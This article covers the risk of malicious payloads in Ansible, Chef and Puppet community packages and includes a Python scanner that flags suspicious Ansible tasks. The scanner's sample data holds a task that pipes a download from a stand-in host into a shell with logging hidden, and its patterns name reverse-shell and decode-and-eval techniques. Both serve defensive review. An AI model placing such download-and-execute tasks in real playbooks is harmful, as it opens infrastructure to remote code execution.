Creating, Detecting, and Preventing Malicious Ansible Packages

Infrastructure as Code (IaC) uses DevOps methodology and version control with a descriptive model to define and deploy infrastructure, such as networks, virtual machines, load balancers, and connection topologies. IaC has been widely adopted due to its ability to standardize and automate infrastructure provisioning and management, promote collaboration and reproducibility, strengthen governance and auditing, enable rapid adjustments and deployments, and support cost optimization and resource management.

Vendor platforms and package repositories

This paradigm is implemented by several vendors, such as Ansible, Chef, and Puppet. Each vendor runs its own repository (Ansible Galaxy, Chef Supermarket, and Puppet Forge, respectively) where developers can find, download, share, and use pre-built instruction sets for specific tasks. For example, deploying an Nginx web server can be achieved by using an Nginx role.

Security concerns with IaC adoption

The widespread adoption of external resources for IaC raised concerns about potential security risks arising from reliance on pre-packaged components without thorough verification. The lack of due diligence in assessing source code leaves systems vulnerable to actors who can inject malicious payloads and gain unauthorized access to an entire infrastructure.

Research objectives

The purpose of this research was to determine whether malicious payloads can be embedded in IaC packages at all. In addition, the available security mechanisms for detecting such payloads were evaluated, including third-party SAST scanners and antivirus scanners.

Detection and prevention methods

Based on these findings, follow-up research was conducted to determine whether payloads are detectable within a range of existing community packages in Ansible Galaxy. Ways to prevent such malicious packages are also discussed.
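As an added example of the kind of detection the follow-up research is concerned with, the script below is a small static-analysis pass over the tasks of an Ansible role. It is not code from the original research or from the Ansible project. It flags the patterns a reviewer would want to inspect before installing a community role: free-form `shell`/`command`/`raw` tasks whose command text pipes a download into a shell or decodes and evaluates content, exec tasks that set `no_log: true` (which hides what ran from the play output), and `get_url`/`uri` tasks fetching over plain HTTP. The task list is constructed inline as the Python objects `yaml.safe_load` would return for a `tasks/main.yml`, so the example runs without PyYAML; the host name `example.invalid` and the heuristic patterns are assumptions made for this example.

```python
"""Added example (not from the original page): a static-analysis pass over
Ansible tasks that flags patterns worth reviewing before installing a role.
Task data is constructed inline as the objects PyYAML would produce from a
tasks/main.yml, so the script has no third-party dependency."""
import re

# Modules whose argument is executed by a shell or interpreter on the managed host.
EXEC_MODULES = {
    "shell", "command", "raw", "script",
    "ansible.builtin.shell", "ansible.builtin.command",
    "ansible.builtin.raw", "ansible.builtin.script",
}
# Modules that fetch remote content; flagged when the source is not HTTPS.
FETCH_MODULES = {"get_url", "uri", "ansible.builtin.get_url", "ansible.builtin.uri"}

# Heuristic patterns (constructed for this example) commonly seen in payload-style commands.
SUSPICIOUS = [
    (re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped into a shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "base64-decoded content executed"),
    (re.compile(r"\beval\b"), "eval of dynamic content"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp socket"),
]


def _exec_text(task):
    """Return the free-form command text of an exec-module task, or None."""
    for mod in EXEC_MODULES:
        if mod in task:
            arg = task[mod]
            if isinstance(arg, dict):          # long form: shell: {cmd: ...}
                arg = arg.get("cmd", "")
            return str(arg)
    return None


def _fetch_url(task):
    """Return the url argument of a fetch-module task, or None."""
    for mod in FETCH_MODULES:
        if mod in task and isinstance(task[mod], dict):
            return str(task[mod].get("url", ""))
    return None


def scan_tasks(tasks, path="tasks/main.yml"):
    """Walk a task list (recursing into block/rescue/always) and return
    a list of (path, task name, reason) findings."""
    findings = []
    for idx, task in enumerate(tasks):
        name = task.get("name", f"<unnamed task {idx}>")
        # Nested task lists inside block/rescue/always are scanned first.
        for key in ("block", "rescue", "always"):
            if isinstance(task.get(key), list):
                findings.extend(scan_tasks(task[key], path))
        cmd = _exec_text(task)
        if cmd is not None:
            for pattern, why in SUSPICIOUS:
                if pattern.search(cmd):
                    findings.append((path, name, why))
            # no_log on an exec task hides the command and its output from the play log.
            if task.get("no_log") is True:
                findings.append((path, name, "shell task with no_log: true"))
        url = _fetch_url(task)
        if url and not url.startswith("https://"):
            findings.append((path, name, f"non-HTTPS download: {url}"))
    return findings


# Constructed sample: what yaml.safe_load would return for a role's tasks/main.yml.
# The first two tasks are benign; the last two carry the patterns the scanner flags.
SAMPLE_TASKS = [
    {"name": "Install nginx",
     "ansible.builtin.apt": {"name": "nginx", "state": "present"}},
    {"name": "Template config",
     "ansible.builtin.template": {"src": "nginx.conf.j2", "dest": "/etc/nginx/nginx.conf"}},
    {"name": "Post-install setup",
     "ansible.builtin.shell": "curl -s http://example.invalid/setup.sh | sh",
     "no_log": True},
    {"name": "Fetch helper",
     "block": [
         {"name": "Download helper",
          "ansible.builtin.get_url": {"url": "http://example.invalid/helper",
                                      "dest": "/tmp/helper"}},
     ]},
]

if __name__ == "__main__":
    for path, name, why in scan_tasks(SAMPLE_TASKS):
        print(f"{path}: task '{name}': {why}")
```

Running the script reports three findings: the `Post-install setup` task for both the piped download and `no_log: true`, and the nested `Download helper` task for its plain-HTTP source. A heuristic pass like this is a review aid, not a verdict: a role can still carry a payload in a template, a `files/` binary, or a bundled module or filter plugin, so the scanner is a first filter before reading the package rather than a substitute for it.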
